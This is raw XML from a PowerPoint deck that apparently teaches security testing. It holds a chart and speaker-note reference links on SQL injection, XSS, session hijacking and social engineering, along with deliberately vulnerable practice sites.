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397" r:id="rId2"/>
    <p:sldId id="405"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99" r:id="rId26"/>
    <p:sldId id="400" r:id="rId27"/>
    <p:sldId id="300" r:id="rId28"/>
    <p:sldId id="401" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="402" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="303" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="305" r:id="rId35"/>
    <p:sldId id="306" r:id="rId36"/>
    <p:sldId id="396" r:id="rId37"/>
    <p:sldId id="307" r:id="rId38"/>
    <p:sldId id="308" r:id="rId39"/>
    <p:sldId id="309" r:id="rId40"/>
    <p:sldId id="312" r:id="rId41"/>
    <p:sldId id="403" r:id="rId42"/>
    <p:sldId id="313" r:id="rId43"/>
    <p:sldId id="404" r:id="rId44"/>
    <p:sldId id="315" r:id="rId45"/>
    <p:sldId id="318" r:id="rId46"/>
    <p:sldId id="394" r:id="rId47"/>
    <p:sldId id="319" r:id="rId48"/>
    <p:sldId id="320"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7" r:id="rId64"/>
    <p:sldId id="338" r:id="rId65"/>
    <p:sldId id="339" r:id="rId66"/>
    <p:sldId id="340" r:id="rId67"/>
    <p:sldId id="392" r:id="rId68"/>
    <p:sldId id="341" r:id="rId69"/>
    <p:sldId id="342" r:id="rId70"/>
    <p:sldId id="343" r:id="rId71"/>
    <p:sldId id="344" r:id="rId72"/>
    <p:sldId id="345" r:id="rId73"/>
    <p:sldId id="346" r:id="rId74"/>
    <p:sldId id="348" r:id="rId75"/>
    <p:sldId id="349" r:id="rId76"/>
    <p:sldId id="351" r:id="rId77"/>
    <p:sldId id="353" r:id="rId78"/>
    <p:sldId id="354" r:id="rId79"/>
    <p:sldId id="355" r:id="rId80"/>
    <p:sldId id="356" r:id="rId81"/>
    <p:sldId id="357" r:id="rId82"/>
    <p:sldId id="359" r:id="rId83"/>
    <p:sldId id="360" r:id="rId84"/>
    <p:sldId id="362" r:id="rId85"/>
    <p:sldId id="363" r:id="rId86"/>
    <p:sldId id="364" r:id="rId87"/>
    <p:sldId id="367" r:id="rId88"/>
    <p:sldId id="365" r:id="rId89"/>
    <p:sldId id="366" r:id="rId90"/>
    <p:sldId id="368" r:id="rId91"/>
    <p:sldId id="369" r:id="rId92"/>
    <p:sldId id="370" r:id="rId93"/>
    <p:sldId id="371" r:id="rId94"/>
    <p:sldId id="391" r:id="rId95"/>
    <p:sldId id="406"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anas Atanasov" initials="AA" lastIdx="17" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-239875337-4187812437-941522809-178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8" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="97" d="100"/>
          <a:sy n="97" d="100"/>
        </p:scale>
        <p:origin x="132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manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="6.9112314085739313E-2"/>
          <c:y val="8.3268126640419979E-2"/>
          <c:w val="0.91560990813648302"/>
          <c:h val="0.84940575787401573"/>
        </c:manualLayout>
      </c:layout>
      <c:bar3DChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 3</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>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c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>9.8000000000000007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-A730-47A9-98C4-6B403E07D208}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 10</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout/>
              <c:showLegendKey val="0"/>
              <c:showVal val="0"/>
              <c:showCatName val="0"/>
              <c:showSerName val="1"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000001-A730-47A9-98C4-6B403E07D208}"/>
                </c:ex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General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>14</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-A730-47A9-98C4-6B403E07D208}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>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c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$2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3-A730-47A9-98C4-6B403E07D208}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 500</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>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c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$E$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>79</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000004-A730-47A9-98C4-6B403E07D208}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$F$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 1000</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>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c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$F$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>91</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-A730-47A9-98C4-6B403E07D208}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$G$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 10000</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="1"/>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c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$G$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>98.8</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-A730-47A9-98C4-6B403E07D208}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="300"/>
        <c:shape val="box"/>
        <c:axId val="371256728"/>
        <c:axId val="371258296"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="371256728"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="371258296"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="371258296"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="3712567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71A67-42F9-4FBD-BDA1-A13A2E1DDB27}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/27/2016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E282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179000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slideshare.net/amiable_indian/advanced-topics-on-sql-injection-protectio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scribd.com/doc/54228526/7/Password-Attack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kioskea.net/contents/attaques/manipulation-url.php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www.slideshare.net/amansyal/session-hijacking-by-rahul-tyagi"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www.slideshare.net/washal/social-engineeringcase-study"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www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Social_engineering_(security)"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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="587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Security Testing, Gary McGraw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"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Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="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92598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180047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Security Testing, Gary McGraw (article)</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86944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267078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86288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Availability - Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>balancing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2584148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Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="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799465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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4285582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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150732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Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Ron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Patton</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157182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baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30747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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3634772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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117503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Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Ron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Patton</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="693711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Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Ron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Patton</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3941473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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2642418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https://en.wikipedia.org/wiki/Ashley_Madison_data_breach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https://nakedsecurity.sophos.com/2013/09/02/facebook-vulnerability-that-allowed-any-photo-to-be-deleted-earns-12500-bounty/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http://venturebeat.com/2015/06/02/these-8-characters-crash-skype-and-once-theyre-in-your-chat-history-the-app-cant-start/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http://heartbleed.com/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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="432002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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2463026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https://www.securepim.com/en/infographic-types-of-cyber-crime-attacks-experienced-by-companies-in-the-united-states-as-of-june-2014/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383372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http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault.asp%3F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="751985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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81135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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1758416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http://www.slideshare.net/amiable_indian/advanced-topics-on-sql-injection-protection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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1137772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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117598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88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956133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http://excess-xss.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1351636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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2099998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http://excess-xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4016734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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2496906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https://www.owasp.org/index.php/Cross-Site_Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https:// www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3182771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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3167080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http://testphp.vulnweb.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>http://testaspnet.vulnweb.com/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>http://testhtml5.vulnweb.com/#/popular</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11046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Software Testing Vol. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</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677458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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2616219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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3948253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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
